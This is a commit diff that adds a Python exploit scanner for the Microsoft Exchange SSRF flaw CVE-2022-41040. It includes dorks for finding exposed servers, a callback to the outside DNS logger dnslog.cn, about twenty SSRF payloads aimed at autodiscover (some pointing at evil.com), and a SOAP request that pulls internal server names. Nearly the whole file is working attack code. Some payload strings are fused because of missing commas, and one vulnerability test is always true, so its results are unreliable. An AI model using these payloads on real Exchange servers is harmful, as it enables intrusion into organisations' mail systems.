x 2022-11-11

hktalent · hktalent · commit f80c7a6f3ad6 · 2022-11-11T17:03:53.000+08:00
diff --git a/tools/CVE-2022-41040.py b/tools/CVE-2022-41040.py
@@ -0,0 +1,200 @@
+#!/usr/bin/env python3
+# from metasploit import module
+
+dependencies_missing = False
+import requests
+from urllib.parse import urlparse
+import subprocess
+import json
+import re,os,sys
+
+metadata = {
+    'name': 'Server Side Request Forgery (SSRF) in Microsoft Exchange Server',
+    'description': '''
+    Server Side Request Forgery (SSRF) in Microsoft Exchange Server
+    dork: app="Microsoft-Exchange" (fofa)
+          http.favicon.hash:1768726119 (Shodan)
+          http.component:"outlook web app" (Shodan)
+          http.component:"outlook web app" ssl:"hybrid" (Shodan)
+          tag.name:"microsoft_exchange" prot7:http http.status_code:200 (Netlas.io)
+          same_service(http://services.http.response.favicons.name: /owa/auth/ and services.http.response.html_title={"Outlook Web App", "Outlook"}) (Censys)
+    ''',
+    'authors': ['Taroballz', 'ITRI-PTTeam'],
+    'references': [
+        {"type": "cve", "ref": "2022-41040"},
+    ],
+    'date': "2022-10-20",
+    "type": "single_scanner",
+    "options": {
+        'rport': {'type': 'int', 'description': 'port', 'required': True, 'default': 443},
+        'rssl': {'type': 'bool', 'description': 'Negotiate SSL for outgoing connections', 'required': True, 'default': 'true'}
+    }
+}
+
+
+
+class Dnslog():
+
+    def __init__(self):
+        try:
+            self.s = requests.session()
+            req = self.s.get("http://www.dnslog.cn/getdomain.php", timeout=30)
+            self.domain = req.text
+        except Exception as e:
+            pass
+            # print(str(e), 'error')
+
+    def pull_logs(self):
+        try:
+            req = self.s.get("http://www.dnslog.cn/getrecords.php", timeout=30)
+            return req.json()
+        except Exception as e:
+            pass
+            # print(str(e), 'error')
+        return None
+
+
+
+def ip2domain(ip: str):
+    try:
+        process = subprocess.Popen(["nslookup", ip], stdout=subprocess.PIPE)
+        output = str(process.communicate()[0])
+        pattern = re.compile("name = ((([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*)")
+        result = re.search(pattern, output)
+        domain = result.group(1)
+        if domain[:-1] == ".":
+            domain = domain[:-1]
+        return domain
+    except Exception as e:
+        print(str(e), 'error')
+
+
+
+def getInfo(url: str):
+    headers = {
+        'Content-Type': 'text/xml',
+        'Accept-Encoding': 'gzip, deflate',
+        'Connection': 'close',
+    }
+
+    data = '<?xml version=\'1.0\' encoding=\'utf-8\'?>\\x0d\\x0a <soap:Envelope\\x0d\\x0a xmlns:soap=\'http://schemas.xmlsoap.org/soap/envelope/\'\\x0d\\x0a xmlns:t=\'http://schemas.microsoft.com/exchange/services/2006/types\'\\x0d\\x0a xmlns:m=\'http://schemas.microsoft.com/exchange/services/2006/messages\'\\x0d\\x0a xmlns:xsi=\'http://www.w3.org/2001/XMLSchema-instance\'>\\x0d\\x0a <soap:Header>\\x0d\\x0a <t:RequestServerVersion Version=\\"Exchange2016\\" />\\x0d\\x0a </soap:Header>\\x0d\\x0a <soap:Body>\\x0d\\x0a <m:FindItem Traversal=\'Shallow\'>\\x0d\\x0a <m:ItemShape>\\x0d\\x0a <t:BaseShape>AllProperties</t:BaseShape>\\x0d\\x0a </m:ItemShape>\\x0d\\x0a <m:ParentFolderIds>\\x0d\\x0a <t:DistinguishedFolderId Id=\'inbox\'>\\x0d\\x0a <t:Mailbox>\\x0d\\x0a <t:EmailAddress>administrator@example.local</t:EmailAddress>\\x0d\\x0a </t:Mailbox>\\x0d\\x0a </t:DistinguishedFolderId>\\x0d\\x0a </m:ParentFolderIds>\\x0d\\x0a </m:FindItem>\\x0d\\x0a </soap:Body>\\x0d\\x0a </soap:Envelope>'
+    header_field = {'computerName': 'X-FEServer',
+                    'backendname': 'X-CalculatedBETarget',
+                    'Application': 'X-ServerApplication'}
+    try:
+        response = requests.post(f'{url}/mapi/nspi', headers=headers, data=data, verify=False)
+        print('Get some info about your target...')
+        for k, v in header_field.items():
+            try:
+                print(k + ": " + response.headers[v], 'good')
+            except Exception as ee:
+                print(str(ee), 'error')
+                continue
+    except Exception as e:
+        print(str(e), 'error')
+
+
+
+def run(args):
+    if dependencies_missing:
+        print("Module dependencies (requests) missing, cannot continue", level="error")
+        return
+
+    host = args['rhost']
+    if host[-1:] == '/':
+        host = host[:-1]
+    if args["rssl"] == "true":
+        sURL = 'https://' + host + ":" + args["rport"]
+    else:
+        sURL = "http://" + host + ":" + args["rport"]
+
+    print(f"Target URL: {sURL}")
+
+    domain = ip2domain(host)
+    print(f"IPv4 look up to domain: {domain}", 'good')
+
+    headers = {
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 pp9520',
+        'Accept': '*/*',
+        'Accept-Language': 'en',
+        'Accept-Encoding': 'gzip, deflate',
+        'Connection': 'close'
+    }
+
+    # for dns checking
+    dns_callback = Dnslog()
+    dns_callback_host = dns_callback.domain
+    print(f"The test DNS server is '{dns_callback_host}'")
+
+    payload_list = [
+        f'/autodiscover/autodiscover.json/v1.0/aa@{dns_callback_host}?Protocol=Autodiscoverv1',
+        f'/autodiscover/autodiscover.json/v1.0/aa..{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a..{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell',
+        f'/autodiscover/autodiscover.json/v1.0/aa@{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a@{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell',
+        f'/autodiscover/autodiscover.json?aa..{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a..{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
+        f'/autodiscover/autodiscover.json?aa@{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a@{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
+        f'/autodiscover/autodiscover.json?aa..{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
+        f'/autodiscover/autodiscover.json?aa@{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a@{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
+        f'/autodiscover/autodiscover.json?aa..{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
+        f'/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell',
+        "/autodiscover/autodiscover.json?@URL/&Email=autodiscover/autodiscover.json%3f@URL",
+        f"/autodiscover/autodiscover.json?@{domain}/&Email=autodiscover/autodiscover.json%3f@{domain}",
+        "/autodiscover/autodiscover.json?@evil.com/Powershell?=Email=autodiscover/autodiscover.json%3f@evil.com"
+        f"/autodiscover/autodiscover.json?@{dns_callback_host}/&Email=autodiscover/autodiscover.json%3f@{dns_callback_host}",
+        f"/autodiscover/autodiscover.json?@{domain}.v1.{dns_callback_host}/&Email=autodiscover/autodiscover.json%3f@{domain}.v1.{dns_callback_host}",
+        f"/autodiscover/autodiscover.json/v1.0/aa@{domain}.v2.{dns_callback_host}?Protocol=Autodiscoverv1",
+        f"/autodiscover/autodiscover.json/v1.0/aa..@{domain}.v3.{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a..@{domain}.v3.{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell",
+        f"/autodiscover/autodiscover.json/v1.0/aa@{domain}.v4.{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a@{domain}.v4.{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell",
+        f"/autodiscover/autodiscover.json?aa..{domain}.v5.{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a..{domain}.v5.{dns_callback_host}&Protocol=Autodiscoverv1&{domain}.v5.{dns_callback_host}Protocol=Powershell",
+        f"/autodiscover/autodiscover.json?aa@{domain}.v6.{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a@{domain}.v6.{dns_callback_host}&Protocol=Autodiscoverv1&{domain}.v6.{dns_callback_host}Protocol=Powershell",
+        f"/autodiscover/autodiscover.json?aa..{domain}.v7.{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{domain}.v7.{dns_callback_host}&Protocol=Autodiscoverv1&{domain}.v7.{dns_callback_host}Protocol=Powershell",
+        f"/autodiscover/autodiscover.json?aa@{domain}.v8.{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a@{domain}.v8.{dns_callback_host}&Protocol=Autodiscoverv1&{domain}.v8.{dns_callback_host}Protocol=Powershell",
+        f"/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@{domain}.v9.{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell"
+        "/autodiscover/autodiscover.json?a@foo.var/owa/&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell"
+        "/autodiscover/autodiscover.json?@1337.com/owa/?&Email=autodiscover/autodiscover.json%3F@1337.com"
+    ]
+
+    for payload in payload_list:
+        url = sURL + payload
+        try:
+            req = requests.get(url, headers=headers, verify=False)
+            print(req.text)
+            if req.status_code == 200 or req.status_code == 302:
+                print(f"GET request '{url}' success", 'good')
+            else:
+                print(f"GET request '{url}' failed", 'error')
+                continue
+            records = dns_callback.pull_logs()
+            if len(records) == 0:
+                pass
+            else:
+                print(f"The target {sURL} seems to be vuln by CVE-2022-41040", "good")
+                print(f"payload: {payload}", 'good')
+                break
+
+            if (dns_callback_host in req.headers) or (req.status_code == 200, 302) or ("IIS Web Core" in req.text) or ('X-FEServer' in req.headers):
+                print('This site is vulnerable to SSRF Check your collabrator client.', 'good')
+                break
+            else:
+                print('It seems not vulnerable, but check your collabrator client!', 'error')
+
+        except Exception as e:
+            print(str(e), 'error')
+
+    else:
+        print(f"The target seems NOT vuln by CVE-2022-41040", "error")
+        exit()
+
+    getInfo(sURL)
+
+
+if __name__ == '__main__':
+    k=sys.argv[1]
+    print(k)
+    oH=urlparse(k)
+    metadata["rssl"] = "false"
+    if k in "https://":
+        metadata["rssl"] = "true"
+    
+    metadata["rhost"] = oH.hostname
+    metadata["rport"] = str(oH.port)
+    run(metadata)
